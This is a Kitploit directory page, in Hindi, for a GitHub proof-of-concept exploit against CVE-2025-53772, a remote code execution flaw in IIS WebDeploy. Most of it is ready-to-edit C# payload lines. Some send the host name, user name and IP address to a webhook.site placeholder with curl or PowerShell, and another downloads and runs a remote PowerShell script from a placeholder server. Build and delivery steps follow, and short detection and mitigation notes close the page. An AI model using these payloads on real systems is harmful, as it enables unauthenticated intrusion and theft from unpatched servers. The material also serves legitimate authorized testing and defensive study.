Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-53772-IIS-WebDeploy-RCE — CVE-2025-53772 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, IIS WebDeploy में असुरक्षित डीसेरियलाइज़ेशन के माध्यम से रिमोट कोड निष्पादन कमजोरी। इसमें जानकारी एकत्र करने, कमांड निष्पादन और रिवर्स शेल के लिए अनुकूलन योग्य पेलोड जनरेशन शामिल है। | Kitploit
उपकरण/GitHubGitHub/momollax/cve-2025-53772-iis-webdeploy-rce
शोषणवेब एप्लिकेशन शोषणकमांड एंड कंट्रोललर्निंग और शिक्षारिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubmomollax/cve-2025-53772-iis-webdeploy-rce

CVE-2025-53772-IIS-WebDeploy-RCE

CVE-2025-53772 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, IIS WebDeploy में असुरक्षित डीसेरियलाइज़ेशन के माध्यम से रिमोट कोड निष्पादन कमजोरी। इसमें जानकारी एकत्र करने, कमांड निष्पादन और रिवर्स शेल के लिए अनुकूलन योग्य पेलोड जनरेशन शामिल है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
5721 साल पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2025-53772 - IIS WebDeploy RCE एक्सप्लॉइट

इस रिपॉजिटरी में CVE-2025-53772 का एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट शामिल है, जो असुरक्षित डिसीरियलाइज़ेशन के माध्यम से IIS WebDeploy में एक रिमोट कोड एक्ज़ीक्यूशन (RCE) भेद्यता है।

⚠️ अस्वीकरण

यह टूल केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है। लेखक इस सॉफ्टवेयर के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है। केवल उन सिस्टम पर उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति है।

🔧 त्वरित सेटअप

1. पेलोड को अनुकूलित करें

poc.cs में पंक्ति 18-19 पर पेलोड को संपादित करके अपने लक्ष्य क्रिया को निर्दिष्ट करें: csharp// अपने वेबहुक URL और वांछित पेलोड से बदलें

root@kitploit:~
set.Add("cmd.exe");
set.Add("/c curl -X POST https://webhook.site/YOUR-WEBHOOK-ID -H \"Content-Type: application/json\" -d \"{\\\"hostname\\\":\\\"%COMPUTERNAME%\\\",\\\"user\\\":\\\"%USERNAME%\\\",\\\"ip\\\":\\\"$(curl -s ifconfig.me)\\\",\\\"exploit\\\":\\\"CVE-2025-53772\\\",\\\"timestamp\\\":\\\"%DATE% %TIME%\\\"}\"");

📋 पेलोड उदाहरण

### 3. एक्सप्लॉइट तैनात करें उत्पन्न Base64 पेलोड का उपयोग करके कमजोर IIS WebDeploy एंडपॉइंट पर हमला करें: ## 🎯 भेद्यता विवरण

सूचना संग्रह (अनुशंसित):

root@kitploit:~
csharpset.Add("powershell.exe");
set.Add("-Command \"$hostname=$env:COMPUTERNAME; $user=$env:USERNAME; $ip=(Invoke-RestMethod -Uri 'https://ipinfo.io/ip' -UseBasicParsing); $body=@{hostname=$hostname;user=$user;ip=$ip;exploit='CVE-2025-53772';timestamp=(Get-Date)} | ConvertTo-Json; Invoke-RestMethod -Uri 'https://webhook.site/YOUR-WEBHOOK-ID' -Method Post -Body $body -ContentType 'application/json'\"");

सरल कमांड निष्पादन:

root@kitploit:~
csharpset.Add("cmd.exe");
set.Add("/c calc.exe");  // कैलकुलेटर खोलता है

रिवर्स शेल (उन्नत):

root@kitploit:~
csharpset.Add("powershell.exe");
set.Add("-Command \"IEX (New-Object Net.WebClient).DownloadString('http://YOUR-SERVER/shell.ps1')\"");

2. एक्सप्लॉइट पेलोड उत्पन्न करें

GitHub Action स्वचालित रूप से PoC को कंपाइल करेगा और Base64-एन्कोडेड पेलोड उत्पन्न करेगा:

अपने बदलावों को पुश करें ताकि GitHub Action ट्रिगर हो अपने रिपॉजिटरी में Actions टैब पर जाएं नवीनतम वर्कफ़्लो रन पर क्लिक करें कंसोल आउटपुट में उत्पन्न पेलोड ढूंढें:

GitHub Actions पेलोड आउटपुट
पेलोड तैनाती उदाहरण

CVE ID: CVE-2025-53772

प्रभावित सॉफ्टवेयर: IIS WebDeploy (एकाधिक संस्करण) भेद्यता प्रकार: असुरक्षित डिसीरियलाइज़ेशन जिससे RCE होता है हमला वेक्टर: रिमोट, अप्रमाणित गंभीरता: क्रिटिकल

🛠️ मैन्युअल कंपाइलेशन (वैकल्पिक)

यदि आप GitHub Actions का उपयोग करने के बजाय स्थानीय रूप से कंपाइल करना पसंद करते हैं: bash# विंडोज .NET फ्रेमवर्क के साथ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe poc.cs poc.exe > payload.txt

या विजुअल स्टूडियो के साथ

csc poc.cs poc.exe

📡 वेबहुक सेट करना

वेबहुक.साइट पर जाकर एक मुफ्त वेबहुक URL प्राप्त करें पेलोड में YOUR-WEBHOOK-ID को अपने अद्वितीय ID से बदलें एक्सप्लॉइट निष्पादन परिणाम देखने के लिए आने वाले अनुरोधों की निगरानी करें

🔍 पहचान और शमन

पहचान:

असामान्य BinaryFormatter डिसीरियलाइज़ेशन गतिविधियों की निगरानी करें IIS वर्कर प्रक्रियाओं से संदिग्ध प्रक्रिया स्पॉनिंग देखें अनपेक्षित आउटबाउंड कनेक्शन के लिए नेटवर्क निगरानी

शमन:

IIS WebDeploy को नवीनतम पैच किए गए संस्करण में अपडेट करें इनपुट सत्यापन और स्वच्छता लागू करें डिसीरियलाइज़ेशन प्रकारों के लिए अनुमति सूची का उपयोग करें नेटवर्क विभाजन और निगरानी तैनात करें

📚 संदर्भ

CVE-2025-53772 विवरण Microsoft सुरक्षा सलाह NIST भेद्यता डेटाबेस

टूल डाउनलोड करें